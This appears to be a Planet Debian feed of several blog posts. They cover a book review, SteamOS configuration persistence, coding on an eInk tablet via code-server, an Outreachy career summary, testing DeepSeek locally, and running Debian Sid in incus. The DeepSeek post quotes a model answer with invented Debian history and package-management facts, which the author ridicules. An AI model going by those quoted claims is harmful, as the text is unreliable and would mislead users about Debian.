We get the normal pieces of a well-done fetch quest: wildly varying locations, some great local characters (the US-based trauma surgeons on vacation in Australia were my favorites), and believable antagonists. There are two other groups looking for the fragments, and while one of them is the standard villain in this sort of story, the other is an apocalyptic cult whose members Fergus mostly feels sorry for and who add just the right amount of surreality to the story. The more we find out about them, the more believable they are, and the more they make this world feel like realistic messy chaos instead of the obvious (and boring) good versus evil patterns that a lot of adventure plots collapse into. There are things about this book that I feel like I should be criticizing, but I just can't. Fetch quests are usually synonymous with lazy plotting, and yet it worked for me. The way Fergus gets dumped into the middle of this problem starts out feeling as arbitrary and unmotivated as some video game fetch quest stories, but by the end of the book it starts to make sense. The story could arguably be described as episodic and cliched, and yet I was thoroughly invested. There are a few pacing problems at the very end, but I was too invested to care that much. This feels like a book that's better than the sum of its parts. Most of the story is future-Earth adventure with some heist elements. The ending goes in a rather different direction but stays at the center of the classic science fiction genre. The Scavenger Door reaches a satisfying conclusion, but there are a ton of unanswered questions that will send me on to the fourth (and reportedly final) novel in the series shortly. This is great stuff. It's not going to win literary awards, but if you're in the mood for some classic science fiction with fun aliens and neat ideas, but also benefiting from the massive improvements in characterization the genre has seen in the past forty years, this series is perfect. Highly recommended. Followed by Ghostdrift. Rating: 9 out of 10

5 February 2025

Alberto Garc a: Keeping your system-wide configuration files intact after updating SteamOS

Introduction If you use SteamOS and you like to install third-party tools or modify the system-wide configuration some of your changes might be lost after an OS update. Read on for details on why this happens and what to do about it.
As you all know SteamOS uses an immutable root filesystem and users are not expected to modify it because all changes are lost after an OS update. However this does not include configuration files: the /etc directory is not part of the root filesystem itself. Instead, it s a writable overlay and all modifications are actually stored under /var (together with all the usual contents that go in that filesystem such as logs, cached data, etc). /etc contains important data that is specific to that particular machine like the configuration of known network connections, the password of the main user and the SSH keys. This configuration needs to be kept after an OS update so the system can keep working as expected. However the update process also needs to make sure that other changes to /etc don t conflict with whatever is available in the new version of the OS, and there have been issues due to some modifications unexpectedly persisting after a system update. SteamOS 3.6 introduced a new mechanism to decide what to to keep after an OS update, and the system now keeps a list of configuration files that are allowed to be kept in the new version. The idea is that only the modifications that are known to be important for the correct operation of the system are applied, and everything else is discarded1. However, many users want to be able to keep additional configuration files after an OS update, either because the changes are important for them or because those files are needed for some third-party tool that they have installed. Fortunately the system provides a way to do that, and users (or developers of third-party tools) can add a configuration file to /etc/atomic-update.conf.d, listing the additional files that need to be kept. There is an example in /etc/atomic-update.conf.d/example-additional-keep-list.conf that shows what this configuration looks like.
Sample configuration file for the SteamOS updater
Developers who are targeting SteamOS can also use this same method to make sure that their configuration files survive OS updates. As an example of an actual third-party project that makes use of this mechanism you can have a look at the DeterminateSystems Nix installer: https://github.com/DeterminateSystems/nix-installer/blob/v0.34.0/src/planner/steam_deck.rs#L273 As usual, if you encounter issues with this or any other part of the system you can check the SteamOS issue tracker. Enjoy!
  1. A copy is actually kept under /etc/previous to give the user the chance to recover files if necessary, and up to five previous snapshots are kept under /var/lib/steamos-atomupd/etc_backup

2 February 2025

Joachim Breitner: Coding on my eInk Tablet

For many years I wished I had a setup that would allow me to work (that is, code) productively outside in the bright sun. It s winter right now, but when its summer again it s always a bit. this weekend I got closer to that goal. TL;DR: Using code-server on a beefy machine seems to be quite neat.
Passively lit coding Passively lit coding

Personal history Looking back at my own old blog entries I find one from 10 years ago describing how I bought a Kobo eBook reader with the intent of using it as an external monitor for my laptop. It seems that I got a proof-of-concept setup working, using VNC, but it was tedious to set up, and I never actually used that. I subsequently noticed that the eBook reader is rather useful to read eBooks, and it has been in heavy use for that every since. Four years ago I gave this old idea another shot and bought an Onyx BOOX Max Lumi. This is an A4-sized tablet running Android and had the very promising feature of an HDMI input. So hopefully I d attach it to my laptop and it just works . Turns out that this never worked as well as I hoped: Even if I set the resolution to exactly the tablet s screen s resolution I got blurry output, and it also drained the battery a lot, so I gave up on this. I subsequently noticed that the tablet is rather useful to take notes, and it has been in sporadic use for that. Going off on this tangent: I later learned that the HDMI input of this device appears to the system like a camera input, and I don t have to use Boox s monitor app but could other apps like FreeDCam as well. This somehow managed to fix the resolution issues, but the setup still wasn t as convenient to be used regularly. I also played around with pure terminal approaches, e.g. SSH ing into a system, but since my usual workflow was never purely text-based (I was at least used to using a window manager instead of a terminal multiplexer like screen or tmux) that never led anywhere either.

VSCode, working remotely Since these attempts I have started a new job working on the Lean theorem prover, and working on or with Lean basically means using VSCode. (There is a very good neovim plugin as well, but I m using VSCode nevertheless, if only to make sure I am dogfooding our default user experience). My colleagues have said good things about using VSCode with the remote SSH extension to work on a beefy machine, so I gave this a try now as well, and while it s not a complete game changer for me, it does make certain tasks (rebuilding everything after a switching branches, running the test suite) very convenient. And it s a bit spooky to run these work loads without the laptop s fan spinning up. In this setup, the workspace is remote, but VSCode still runs locally. But it made me wonder about my old goal of being able to work reasonably efficient on my eInk tablet. Can I replicate this setup there? VSCode itself doesn t run on Android directly. There are project that run a Linux chroot or in termux on the Android system, and then you can VNC to connect to it (e.g. on Andronix) but that did not seem promising. It seemed fiddly, and I probably should take it easy on the tablet s system.

code-server, running remotely A more promising option is code-server. This is a fork of VSCode (actually of VSCodium) that runs completely on the remote machine, and the client machine just needs a browser. I set that up this weekend and found that I was able to do a little bit of work reasonably.

Access With code-server one has to decide how to expose it safely enough. I decided against the tunnel-over-SSH option, as I expected that to be somewhat tedious to set up (both initially and for each session) on the android system, and I liked the idea of being able to use any device to work in my environment. I also decided against the more involved reverse proxy behind proper hostname with SSL setups, because they involve a few extra steps, and some of them I cannot do as I do not have root access on the shared beefy machine I wanted to use. That left me with the option of using a code-server s built-in support for self-signed certificates and a password:
$ cat .config/code-server/config.yaml
bind-addr: 1.2.3.4:8080
auth: password
password: xxxxxxxxxxxxxxxxxxxxxxxx
cert: true
With trust-on-first-use this seems reasonably secure. Update: I noticed that the browsers would forget that I trust this self-signed cert after restarting the browser, and also that I cannot install the page (as a Progressive Web App) unless it has a valid certificate. But since I don t have superuser access to that machine, I can t just follow the official recommendation of using a reverse proxy on port 80 or 431 with automatic certificates. Instead, I pointed a hostname that I control to that machine, obtained a certificate manually on my laptop (using acme.sh) and copied the files over, so the configuration now reads as follows:
bind-addr: 1.2.3.4:3933
auth: password
password: xxxxxxxxxxxxxxxxxxxxxxxx
cert: .acme.sh/foobar.nomeata.de_ecc/foobar.nomeata.de.cer
cert-key: .acme.sh/foobar.nomeata.de_ecc/foobar.nomeata.de.key
(This is getting very specific to my particular needs and constraints, so I ll spare you the details.)

Service To keep code-server running I created a systemd service that s managed by my user s systemd instance:
~ $ cat ~/.config/systemd/user/code-server.service
[Unit]
Description=code-server
After=network-online.target
[Service]
Environment=PATH=/home/joachim/.nix-profile/bin:/nix/var/nix/profiles/default/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
ExecStart=/nix/var/nix/profiles/default/bin/nix run nixpkgs#code-server
[Install]
WantedBy=default.target
(I am using nix as a package manager on a Debian system there, hence the additional PATH and complex ExecStart. If you have a more conventional setup then you do not have to worry about Environment and can likely use ExecStart=code-server. For this to survive me logging out I had to ask the system administrator to run loginctl enable-linger joachim, so that systemd allows my jobs to linger.

Git credentials The next issue to be solved was how to access the git repositories. The work is all on public repositories, but I still need a way to push my work. With the classic VSCode-SSH-remote setup from my laptop, this is no problem: My local SSH key is forwarded using the SSH agent, so I can seamlessly use that on the other side. But with code-server there is no SSH key involved. I could create a new SSH key and store it on the server. That did not seem appealing, though, because SSH keys on Github always have full access. It wouldn t be horrible, but I still wondered if I can do better. I thought of creating fine-grained personal access tokens that only me to push code to specific repositories, and nothing else, and just store them permanently on the remote server. Still a neat and convenient option, but creating PATs for our org requires approval and I didn t want to bother anyone on the weekend. So I am experimenting with Github s git-credential-manager now. I have configured it to use git s credential cache with an elevated timeout, so that once I log in, I don t have to again for one workday.
$ nix-env -iA nixpkgs.git-credential-manager
$ git-credential-manager configure
$ git config --global credential.credentialStore cache
$ git config --global credential.cacheOptions "--timeout 36000"
To login, I have to https://github.com/login/device on an authenticated device (e.g. my phone) and enter a 8-character code. Not too shabby in terms of security. I only wish that webpage would not require me to press Tab after each character This still grants rather broad permissions to the code-server, but at least only temporarily

Android setup On the client side I could now open https://host.example.com:8080 in Firefox on my eInk Android tablet, click through the warning about self-signed certificates, log in with the fixed password mentioned above, and start working! I switched to a theme that supposedly is eInk-optimized (eInk by Mufanza). It s not perfect (e.g. git diffs are unhelpful because it is not possible to distinguish deleted from added lines), but it s a start. There are more eInk themes on the official Visual Studio Marketplace, but because code-server is a fork it cannot use that marketplace, and for example this theme isn t on Open-VSX. For some reason the F11 key doesn t work, but going fullscreen is crucial, because screen estate is scarce in this setup. I can go fullscreen using VSCode s command palette (Ctrl-P) and invoking the command there, but Firefox often jumps out of the fullscreen mode, which is annoying. I still have to pay attention to when that s happening; maybe its the Esc key, which I am of course using a lot due to me using vim bindings. A more annoying problem was that on my Boox tablet, sometimes the on-screen keyboard would pop up, which is seriously annoying! It took me a while to track this down: The Boox has two virtual keyboards installed: The usual Google ASOP keyboard, and the Onyx Keyboard. The former is clever enough to stay hidden when there is a physical keyboard attached, but the latter isn t. Moreover, pressing Shift-Ctrl on the physical keyboard rotates through the virtual keyboards. Now, VSCode has many keyboard shortcuts that require Shift-Ctrl (especially on an eInk device, where you really want to avoid using the mouse). And the limited settings exposed by the Boox Android system do not allow you configure that or disable the Onyx keyboard! To solve this, I had to install the KISS Launcher, which would allow me to see more Android settings, and in particular allow me to disable the Onyx keyboard. So this is fixed. I was hoping to improve the experience even more by opening the web page as a Progressive Web App (PWA), as described in the code-server FAQ. Unfortunately, that did not work. Firefox on Android did not recognize the site as a PWA (even though it recognizes a PWA test page). And I couldn t use Chrome either because (unlike Firefox) it would not consider a site with a self-signed certificate as a secure context, and then code-server does not work fully. Maybe this is just some bug that gets fixed in later versions. Now that I use a proper certificate, I can use it as a Progressive Web App, and with Firefox on Android this starts the app in full-screen mode (no system bars, no location bar). The F11 key still does t work, and using the command palette to enter fullscreen does nothing visible, but then Esc leaves that fullscreen mode and I suddenly have the system bars again. But maybe if I just don t do that I get the full screen experience. We ll see. I did not work enough with this yet to assess how much the smaller screen estate, the lack of colors and the slower refresh rate will bother me. I probably need to hide Lean s InfoView more often, and maybe use the Error Lens extension, to avoid having to split my screen vertically. I also cannot easily work on a park bench this way, with a tablet and a separate external keyboard. I d need at least a table, or some additional piece of hardware that turns tablet + keyboard into some laptop-like structure that I can put on my, well, lap. There are cases for Onyx products that include a keyboard, and maybe they work on the lap, but they don t have the Trackpoint that I have on my ThinkPad TrackPoint Keyboard II, and how can you live without that?

Conclusion After this initial setup chances are good that entering and using this environment is convenient enough for me to actually use it; we will see when it gets warmer. A few bits could be better. In particular logging in and authenticating GitHub access could be both more convenient and more safe I could imagine that when I open the page I confirm that on my phone (maybe with a fingerprint), and that temporarily grants access to the code-server and to specific GitHub repositories only. Is that easily possible?

31 January 2025

Divine Attah-Ohiemi: Seeking Opportunities: Building a Career in Software Engineering and Beyond

My journey in CS has always been driven by curiosity, determination, and a deep love for understanding software solutions at its tiniest, most complex levels. Taking ALX Africa Software Engineer track after High school was where it all started for me. During the 1-year intensive bootcamp, I delved into the intricacies of Linux programming and low-level programming with C, which solidified my foundational knowledge. This experience not only enhanced my technical skills but also taught me the importance of adaptability and self-directed learning. I discovered how to approach challenges with curiosity, igniting a passion for exploring software solutions in their most intricate forms. Each module pushed me to think critically and creatively, transforming my understanding of technology and its capabilities. Let s just say that I have always been drawn to asking, How does this happen?" And I just go on and on until I find an answer eventually and sometimes I don t but that s okay. That curiosity, combined with a deep commitment to learning, has guided my journey. Debian Webmaster My drive has led me to get involved in open-source contributions, where I can put my knowledge to the test while helping my community. Engaging with real-world experts and learning from my mistakes has been invaluable. One of the highlights of this journey was joining the Debian Webmasters team as an intern through Outreachy. Here, I have the honor of working on redesigning and migrating the old Debian webpages to make them more user-friendly. This experience not only allows me to apply my skills in a practical setting but also deepens my understanding of collaborative software development. Building My Skills: The Foundation of My Experience Throughout my academic and professional journey, I have taken on many roles that have shaped my skills and prepared me for what s ahead I believe. I am definitely not a one-trick pony, and maybe not completely a jack of all trade either but I am a bit diverse I d like to think. Here are the key roles that have defined my journey so far: Volunteer Developer at Yoris Africa (June 2022 - August 2023) I began my career by volunteering at Yoris, where I collaborated with a talented team to design and build the frontend for a mobile app. My contributions extended beyond just the frontend; I also worked on backend solutions and microservices, gaining hands-on experience in full-stack development. This role was instrumental in shaping my understanding of software architecture, allowing me to contribute meaningfully to projects while learning from experienced developers in a dynamic environment. Freelance Academics Software Developer (September 2023 - October 2024) I freelanced as an academic software developer, where I pitched and developed software solutions for universities in my community. One of my most notable projects was creating a Computer-Based Testing (CBT) software for a medical school, which featured a unique questionnaire and scoring system tailored to their specific needs. This experience not only allowed me to apply my technical skills in a real-world setting but also deepened my understanding of educational software requirements and user experience, ultimately enhancing the learning process for students. Open Source Intern at Debian Webmaster Team (November 2024 -) Perhaps the most transformative experience has been my role as an intern at Debian Webmasters. This opportunity allowed me to delve into the fascinating world of open source. As an intern, I have the chance to work on a project where we are redesigning and migrating the Debian webpages to utilize a new and faster technology: Go templates with Hugo. For a detailed look at the work and progress I made during my internship, as well as information on this project and how to get involved, you can check out the wiki. My ultimate goal with this role is to build a vibrant community for Debian in Africa and, if given the chance, to host a debian-cd mirror for faster installations in my region. You can connect with me through LinkedIn, or X (formerly Twitter), or reach out via email.

29 January 2025

Sergio Talens-Oliag: Testing DeepSeek with Ollama and Open WebUI

With all the recent buzz about DeepSeek and its capabilities, I ve decided to give it a try using Ollama and Open WebUI on my work laptop which has an NVIDIA GPU:
$ lspci   grep NVIDIA
0000:01:00.0 3D controller: NVIDIA Corporation GA107GLM [RTX A2000 8GB Laptop GPU]
             (rev a1)
For the installation I initially I looked into the approach suggested on this article, but after reviewing it I decided to go for a docker only approach, as it leaves my system clean and updates are easier.

Step 0: Install dockerI already had it on my machine, so nothing to do here.

Step 1: Install the nvidia-container-toolkit packageAs it is needed to use the NVIDIA GPU with docker I followed the instructions to install the package using apt from the NVIDIA website.

Step 2: Run the Open WebUI container bundled with OllamaI could install ollama directly on linux or run it on docker, but I found out that there is a container with Open WebUI bundled with Ollama, so I decided to use it instead. To start the container I ve executed the following command:
docker run -d \
  -e OLLAMA_HOST="0.0.0.0:11434" -p 127.0.0.1:11434:11434 \
  -p 127.0.0.1:3000:8080 \
  -v ollama:/root/.ollama \
  -v open-webui:/app/backend/data \
  --gpus=all --name open-webui --restart always \
  ghcr.io/open-webui/open-webui:ollama
Once the container is up and running, I can access the Open WebUI on http://localhost:3000/ and the Ollama API on http://localhost:11434/ (I added the OLLAMA_HOST environment variable to be bind the server to all the container IPs, as it is needed to export it to the host).

Step 3: Install DeepSeek-R1 model from Open WebUIAfter creating an admin user on the Open WebUI, I went to the select a model button and asked to download the deepseek-r1 model (at the time of writing this it matches version deepseek-r1:7b, which uses 4.7GB of space). After the download was completed I was able to start chatting with the model on my local machine.

Step 4: Ask a questionThe first question I asked was Can you tell me what is Debian? and the answer I got was:
Debian is one of the most popular Linux distributions used worldwide. It is an
open-source operating system that has been around since 1993 and is known for
its stability, security, and reliability. Debian is widely used in servers, data
centers, and enterprise environments because it provides a robust base platform
with excellent documentation, tools, and community support.
### Key Features of Debian:

1. **History**:
   - Debian started as a project called "Pop!!" (Pootle) led by Lars Knutsen, a
     developer from Denmark.
   - It was initially forked from the Linux distribution Red Hat's RH-Debian to
     gain independence and reduce reliance on Red Hat.

2. **Use Cases**:
   - Debian is commonly used as an operating system for servers due to its
     reliability and ease of use in enterprise environments.
   - It is also used for individual user machines (laptops, desktops) because it
     offers a smooth and stable experience.
   - Debian provides the foundation for many popular derivatives like Ubuntu,
     which are designed for consumer use.

3. **Supported Architectures**:
   - Debian supports all major Linux architectures, including 32-bit and 64-bit
     systems, and runs on a wide range of hardware from old servers to modern
     smartphones.

4. **Package Management**:
   - Debian comes with a robust package management system called **Debian Policy
     Language (DPL)**, which allows users to easily install, update, and manage
     software packages.
   - This makes it easy for users to keep their systems up to date without
     needing to download multiple repositories or deal with version conflicts.

5. **Security Focus**:
   - Debian is known for its strong security practices. It has a reputation for
     being one of the most stable Linux distributions, making it a favorite
     among organizations that prioritize security.
   - The distribution regularly updates its software packages to patch
     vulnerabilities and protect against common attacks.

6. **Compatibility with Servers**:
   - Debian is widely used in data centers because it provides a consistent and
     reliable environment for running servers and applications.
   - Many open-source projects are compatible with Debian, making it an ideal
     choice for developers who want to work on servers or distributed systems.

7. **Popularity**:
   - Debian has a large and active community of users and contributors.
   - It is one of the most widely used Linux distributions in the world, with
     many enterprise organizations relying on it as their primary operating
     system.
### Comparison with Other Distributions:
- **Ubuntu**: Ubuntu is based on Debian but adds graphical user interfaces (like
  Gutsy Gibbon), modern tools (like GIMP and LibreOffice), and integrates with
  Microsoft services.
- **RHEL (Red Hat Enterprise Linux)**: RHEL is a derivative of Red Hat's
  distribution, which forked from Debian. It focuses more heavily on enterprise
  security and support compared to Debian.
### Why Debian?
Debian is popular because:
- It is free and open-source, making it accessible to anyone.
- It provides excellent documentation and tools for system administrators.
- It has a strong focus on stability and reliability.
- It supports a wide range of hardware and software needs.
If you're looking for a reliable and flexible Linux distribution that works well
in both personal and enterprise environments, Debian is an excellent choice.
Haven t tried the same question with ChatGPT, but the History, Package Management and Comparison with Other Distributions sections are hilarious, but they provided me with important data:
  • Now I know that APT is the real Debian Project Leader, what don t know is why we have elections each year ;)
  • Linux Distributions are recursive Debian was a fork of Red Hat, which was a fork of Debian, which was a fork of Red Hat,
As everybody is testing the model I will not talk more about the chat and the results, I just thought that this answer was really funny.

Step 5: Install the DeepSeek Coder and DeepSeek Coder v2 models from Open WebUIAs done before, to download the models I went to the select a model button and asked to download the deepseek-coder and deepseek-coder-v2 models (the default version of version one is said to be really quick and small, while version two is supposed to be better but slower and bigger, so I decided to install both for testing).

Step 6: Integrate Ollama with NeovimSince some months ago I ve been using Github Copilot with Neovim; I don t feel it has been very helpful in the general case, but I wanted to try it and it comes handy when you need to perform repetitive tasks when programming. It seems that there are multiple neovim plugins that support ollama, for now I ve installed and configured the codecompanion plugin on my config.lua file using packer:
require('packer').startup(function()
  [...]
  -- Codecompanion plugin
  use  
    "olimorris/codecompanion.nvim",
    requires =  
      "nvim-lua/plenary.nvim",
      "nvim-treesitter/nvim-treesitter",
     
   
  [...]
end)
[...]
-- --------------------------------
-- BEG: Codecompanion configuration
-- --------------------------------
-- Module setup
local codecompanion = require('codecompanion').setup( 
  adapters =  
    ollama = function()
      return require('codecompanion.adapters').extend('ollama',  
        schema =  
          model =  
            default = 'deepseek-coder-v2:latest',
           
         ,
       )
    end,
   ,
  strategies =  
    chat =   adapter = 'ollama',  ,
    inline =   adapter = 'ollama',  ,
   ,
 )
-- --------------------------------
-- END: Codecompanion configuration
-- --------------------------------
I ve tested it a little bit and it seems to work fine, but I ll have to test it more to see if it is really useful, I ll try to do it on future projects.

ConclusionAt a personal level I don t like nor trust AI systems, but as long as they are treated as tools and not as a magical thing you must trust they have their uses and I m happy to see that open source tools like Ollama and models like DeepSeek available for everyone to use.

27 January 2025

Sergio Talens-Oliag: Running a Debian Sid on Ubuntu

Although I am a Debian Developer (not very active, BTW) I am using Ubuntu LTS (right now version 24.04.1) on my main machine; it is my work laptop and I was told to keep using Ubuntu on it when it was assigned to me, although I don t believe it is really necessary or justified (I don t need support, I don t provide support to others and I usually test my shell scripts on multiple systems if needed anyway). Initially I kept using Debian Sid on my personal laptop, but I gave it to my oldest son as the one he was using (an old Dell XPS 13) was stolen from him a year ago. I am still using Debian stable on my servers (one at home that also runs LXC containers and another one on an OVH VPS), but I don t have a Debian Sid machine anymore and while I could reinstall my work machine, I ve decided I m going to try to use a system container to run Debian Sid on it. As I want to use a container instead of a VM I ve narrowed my options to lxc or systemd-nspawn (I have docker and podman installed, but I don t believe they are good options for running system containers). As I will want to take snapshots of the container filesystem I ve decided to try incus instead of systemd-nspawn (I already have experience with it and while it works well it has less features than incus).

Installing incusAs this is a personal system where I want to try things, instead of using the packages included with Ubuntu I ve decided to install the ones from the zabbly incus stable repository. To do it I ve executed the following as root:
# Get the zabbly repository GPG key
curl -fsSL https://pkgs.zabbly.com/key.asc -o /etc/apt/keyrings/zabbly.asc
# Create the zabbly-incus-stable.sources file
sh -c 'cat <<EOF > /etc/apt/sources.list.d/zabbly-incus-stable.sources
Enabled: yes
Types: deb
URIs: https://pkgs.zabbly.com/incus/stable
Suites: $(. /etc/os-release && echo $ VERSION_CODENAME )
Components: main
Architectures: $(dpkg --print-architecture)
Signed-By: /etc/apt/keyrings/zabbly.asc
EOF'
Initially I only plan to use the command line tools, so I ve installed the incus and the incus-extra packages, but once things work I ll probably install the incus-ui-canonical package too, at least for testing it:
apt update
apt install incus incus-extra

Adding my personal user to the incus-admin groupTo be able to run incus commands as my personal user I ve added it to the incus-admin group:
sudo adduser "$(id -un)" incus-admin
And I ve logged out and in again of my desktop session to make the changes effective.

Initializing the incus environmentTo configure the incus environment I ve executed the incus admin init command and accepted the defaults for all the questions, as they are good enough for my current use case.

Creating a Debian containerTo create a Debian container I ve used the default debian/trixie image:
incus launch images:debian/trixie debian
This command downloads the image and creates a container named debian using the default profile. The exec command can be used to run a root login shell inside the container:
incus exec debian -- su -l
Instead of exec we can use the shell alias:
incus shell debian
which does the same as the previous command. Inside that shell we can try to update the machine to sid changing the /etc/apt/sources.list file and using apt:
root@debian:~# echo "deb http://deb.debian.org/debian sid main contrib non-free" \
  >/etc/apt/sources.list
root@debian:~# apt update
root@debian:~# apt dist-upgrade
As my machine has docker installed the apt update command fails because the network does not work, to fix it I ve executed the commands of the following section and re-run the apt update and apt dist-upgrade commands.

Making the incusbr0 bridge work with DockerTo avoid problems with docker networking we have to add rules for the incusbr0 bridge to the DOCKER-USER chain as follows:
sudo iptables -I DOCKER-USER -i incusbr0 -j ACCEPT
sudo iptables -I DOCKER-USER -o incusbr0 -m conntrack \
  --ctstate RELATED,ESTABLISHED -j ACCEPT
That makes things work now, but to make things persistent across reboots we need to add them each time the machine boots. As suggested by the incus documentation I ve installed the iptables-persistent package (my command also purges the ufw package, as I was not using it) and saved the current rules when installing:
sudo apt install iptables-persistent --purge

Integrating the DNS resolution of the container with the hostTo make DNS resolution for the ictus containers work from the host I ve followed the incus documentation. To set up things manually I ve run the following:
br="incusbr0";
br_ipv4="$(incus network get "$br" ipv4.address)";
br_domain="$(incus network get "$br" dns.domain)";
dns_address="$ br_ipv4%/* ";
dns_domain="$ br_domain:=incus ";
resolvectl dns "$br" "$ dns_address ";
resolvectl domain "$br" "~$ dns_domain ";
resolvectl dnssec "$br" off;
resolvectl dnsovertls "$br" off;
And to make the changes persistent across reboots I ve created the following service file:
sh -c "cat <<EOF   sudo tee /etc/systemd/system/incus-dns-$ br .service
[Unit]
Description=Incus per-link DNS configuration for $ br 
BindsTo=sys-subsystem-net-devices-$ br .device
After=sys-subsystem-net-devices-$ br .device
[Service]
Type=oneshot
ExecStart=/usr/bin/resolvectl dns $ br  $ dns_address 
ExecStart=/usr/bin/resolvectl domain $ br  ~$ dns_domain 
ExecStart=/usr/bin/resolvectl dnssec $ br  off
ExecStart=/usr/bin/resolvectl dnsovertls $ br  off
ExecStopPost=/usr/bin/resolvectl revert $ br 
RemainAfterExit=yes
[Install]
WantedBy=sys-subsystem-net-devices-$ br .device
EOF"
And enabled it:
sudo systemctl daemon-reload
sudo systemctl enable --now incus-dns-$ br .service
If all goes well the DNS resolution works from the host:
$ host debian.incus
debian.incus has address 10.149.225.121
debian.incus has IPv6 address fd42:1178:afd8:cc2c:216:3eff:fe2b:5cea

Using my host user and home dir inside the containerTo use my host user and home directory inside the container I need to add the user and group to the container. First I ve added my user group with the same GID used on the host:
incus exec debian -- addgroup --gid "$(id --group)" --allow-bad-names \
  "$(id --group --name)"
Once I have the group I ve added the user with the same UID and GID as on the host, without defining a password for it:
incus exec debian -- adduser --uid "$(id --user)" --gid "$(id --group)" \
  --comment "$(getent passwd "$(id --user -name)"   cut -d ':' -f 5)" \
  --no-create-home --disabled-password --allow-bad-names \
  "$(id --user --name)"
Once the user is created we can mount the home directory on the container (we add the shift option to make the container use the same UID and GID as we do on the host):
incus config device add debian home disk source=$HOME path=$HOME shift=true
We have the shell alias to log with the root account, now we can add another one to log into the container using the newly created user:
incus alias add ush "exec @ARGS@ -- su -l $(id --user --name)"
To log into the container as our user now we just need to run:
incus ush debian
To be able to use sudo inside the container we could add our user to the sudo group:
incus exec debian -- adduser "$(id --user --name)" "sudo"
But that requires a password and we don t have one, so instead we are going to add a file to the /etc/sudoers.d directory to allow our user to run sudo without a password:
incus exec debian -- \
  sh -c "echo '$(id --user --name) ALL = NOPASSWD: ALL' /etc/sudoers.d/user"

Accessing the container using sshTo use the container as a real machine and log into it as I do on remote machines I ve installed the openssh-server and authorized my laptop public key to log into my laptop (as we are mounting the home directory from the host that allows us to log in without password from the local machine). Also, to be able to run X11 applications from the container I ve adusted the $HOME/.ssh/config file to always forward X11 (option ForwardX11 yes for Host debian.incus) and installed the xauth package. After that I can log into the container running the command ssh debian.incus and start using it after installing other interesting tools like neovim, rsync, tmux, etc.

Taking snapshots of the containerAs this is a system container we can take snapshots of it using the incus snapshot command; that can be specially useful to take snapshots before doing a dist-upgrade so we can rollback if something goes wrong. To work with container snapshots we run use the incus snapshot command, i.e. to create a snapshot we use de create subcommand:
incus snapshot create debian
The snapshot sub commands include options to list the available snapshots, restore a snapshot, delete a snapshot, etc.

ConclusionSince last week I have a terminal running a tmux session on the Debian Sid container with multiple zsh windows open (I ve changed the prompt to be able to notice easily where I am) and it is working as expected. My plan now is to add some packages and use the container for personal projects so I can work on a Debian Sid system without having to reinstall my work machine. I ll probably write more about it in the future, but for now, I m happy with the results.

Next.